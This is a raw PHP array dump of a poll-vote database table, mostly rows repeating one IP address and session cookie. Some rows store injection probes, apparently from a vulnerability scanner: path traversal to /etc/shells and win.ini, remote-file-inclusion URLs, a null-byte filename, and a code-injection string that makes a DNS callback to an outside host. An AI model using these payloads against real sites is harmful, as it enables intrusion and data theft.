'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4764 => array(
'id' => '5307',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4765 => array(
'id' => '5308',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4766 => array(
'id' => '5309',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4767 => array(
'id' => '5310',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4768 => array(
'id' => '5311',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4769 => array(
'id' => '5312',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4770 => array(
'id' => '5313',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4771 => array(
'id' => '5314',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4772 => array(
'id' => '5315',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4773 => array(
'id' => '5316',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4774 => array(
'id' => '5317',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4775 => array(
'id' => '5318',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4776 => array(
'id' => '5319',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4777 => array(
'id' => '5320',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4778 => array(
'id' => '5321',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4779 => array(
'id' => '5322',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4780 => array(
'id' => '5323',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4781 => array(
'id' => '5324',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4782 => array(
'id' => '5325',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4783 => array(
'id' => '5326',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4784 => array(
'id' => '5327',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4785 => array(
'id' => '5328',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4786 => array(
'id' => '5329',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4787 => array(
'id' => '5330',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4788 => array(
'id' => '5331',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4789 => array(
'id' => '5332',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4790 => array(
'id' => '5333',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4791 => array(
'id' => '5334',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4792 => array(
'id' => '5335',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4793 => array(
'id' => '5336',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4794 => array(
'id' => '5337',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4795 => array(
'id' => '5338',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4796 => array(
'id' => '5339',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4797 => array(
'id' => '5340',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4798 => array(
'id' => '5341',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4799 => array(
'id' => '5342',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4800 => array(
'id' => '5343',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4801 => array(
'id' => '5344',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4802 => array(
'id' => '5345',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4803 => array(
'id' => '5346',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4804 => array(
'id' => '5347',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4805 => array(
'id' => '5348',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4806 => array(
'id' => '5349',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4807 => array(
'id' => '5350',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4808 => array(
'id' => '5351',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4809 => array(
'id' => '5352',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4810 => array(
'id' => '5353',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4811 => array(
'id' => '5354',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4812 => array(
'id' => '5355',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4813 => array(
'id' => '5356',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4814 => array(
'id' => '5357',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4815 => array(
'id' => '5358',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4816 => array(
'id' => '5359',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4817 => array(
'id' => '5360',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4818 => array(
'id' => '5361',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4819 => array(
'id' => '5362',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4820 => array(
'id' => '5363',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4821 => array(
'id' => '5364',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4822 => array(
'id' => '5365',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4823 => array(
'id' => '5366',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4824 => array(
'id' => '5367',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4825 => array(
'id' => '5368',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4826 => array(
'id' => '5369',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4827 => array(
'id' => '5370',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4828 => array(
'id' => '5371',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4829 => array(
'id' => '5372',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4830 => array(
'id' => '5373',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4831 => array(
'id' => '5374',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4832 => array(
'id' => '5375',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4833 => array(
'id' => '5376',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4834 => array(
'id' => '5377',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4835 => array(
'id' => '5378',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4836 => array(
'id' => '5379',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4837 => array(
'id' => '5380',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4838 => array(
'id' => '5381',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4839 => array(
'id' => '5382',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4840 => array(
'id' => '5383',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4841 => array(
'id' => '5384',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4842 => array(
'id' => '5385',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4843 => array(
'id' => '5386',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4844 => array(
'id' => '5387',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4845 => array(
'id' => '5388',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4846 => array(
'id' => '5389',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4847 => array(
'id' => '5390',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4848 => array(
'id' => '5391',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4849 => array(
'id' => '5392',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4850 => array(
'id' => '5393',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4851 => array(
'id' => '5394',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4852 => array(
'id' => '5395',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4853 => array(
'id' => '5396',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4854 => array(
'id' => '5397',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4855 => array(
'id' => '5398',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4856 => array(
'id' => '5399',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4857 => array(
'id' => '5400',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4858 => array(
'id' => '5401',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4859 => array(
'id' => '5402',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4860 => array(
'id' => '5403',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4861 => array(
'id' => '5404',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4862 => array(
'id' => '5405',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4863 => array(
'id' => '5406',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4864 => array(
'id' => '5407',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4865 => array(
'id' => '5408',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4866 => array(
'id' => '5409',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4867 => array(
'id' => '5410',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4868 => array(
'id' => '5411',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4869 => array(
'id' => '5412',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4870 => array(
'id' => '5413',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4871 => array(
'id' => '5414',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4872 => array(
'id' => '5415',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4873 => array(
'id' => '5416',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4874 => array(
'id' => '5417',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4875 => array(
'id' => '5418',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4876 => array(
'id' => '5419',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4877 => array(
'id' => '5420',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4878 => array(
'id' => '5421',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4879 => array(
'id' => '5422',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4880 => array(
'id' => '5423',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4881 => array(
'id' => '5424',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4882 => array(
'id' => '5425',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4883 => array(
'id' => '5426',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4884 => array(
'id' => '5427',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4885 => array(
'id' => '5428',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4886 => array(
'id' => '5429',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4887 => array(
'id' => '5430',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4888 => array(
'id' => '5431',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4889 => array(
'id' => '5432',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4890 => array(
'id' => '5433',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4891 => array(
'id' => '5434',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4892 => array(
'id' => '5435',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4893 => array(
'id' => '5436',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4894 => array(
'id' => '5437',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4895 => array(
'id' => '5438',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4896 => array(
'id' => '5439',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4897 => array(
'id' => '5440',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4898 => array(
'id' => '5441',
'ip' => '194.34.233.72',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 4899 => array(
'id' => '5442',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4900 => array(
'id' => '5443',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4901 => array(
'id' => '5444',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4902 => array(
'id' => '5445',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4903 => array(
'id' => '5446',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4904 => array(
'id' => '5447',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4905 => array(
'id' => '5448',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4906 => array(
'id' => '5449',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4907 => array(
'id' => '5450',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4908 => array(
'id' => '5451',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4909 => array(
'id' => '5452',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4910 => array(
'id' => '5453',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4911 => array(
'id' => '5454',
'ip' => '194.34.233.72',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 4912 => array(
'id' => '5455',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4913 => array(
'id' => '5456',
'ip' => '194.34.233.72',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 4914 => array(
'id' => '5457',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4915 => array(
'id' => '5458',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4916 => array(
'id' => '5459',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4917 => array(
'id' => '5460',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4918 => array(
'id' => '5461',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4919 => array(
'id' => '5462',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4920 => array(
'id' => '5463',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4921 => array(
'id' => '5464',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4922 => array(
'id' => '5465',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4923 => array(
'id' => '5466',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4924 => array(
'id' => '5467',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4925 => array(
'id' => '5468',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4926 => array(
'id' => '5469',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4927 => array(
'id' => '5470',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4928 => array(
'id' => '5471',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4929 => array(
'id' => '5472',
'ip' => ''"()',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4930 => array(
'id' => '5473',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4931 => array(
'id' => '5474',
'ip' => '194.34.233.72',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 4932 => array(
'id' => '5475',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4933 => array(
'id' => '5476',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4934 => array(
'id' => '5477',
'ip' => '194.34.233.72',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 4935 => array(
'id' => '5478',
'ip' => '194.34.233.72',
'ip1' => ''.gethostbyname(lc('hitms'.'uaduvdsd9c943.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(72).chr(113).chr(80).'',
'sondage_id' => '2'
),
(int) 4936 => array(
'id' => '5479',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4937 => array(
'id' => '5480',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4938 => array(
'id' => '5481',
'ip' => '194.34.233.72',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 4939 => array(
'id' => '5482',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4940 => array(
'id' => '5483',
'ip' => '194.34.233.72',
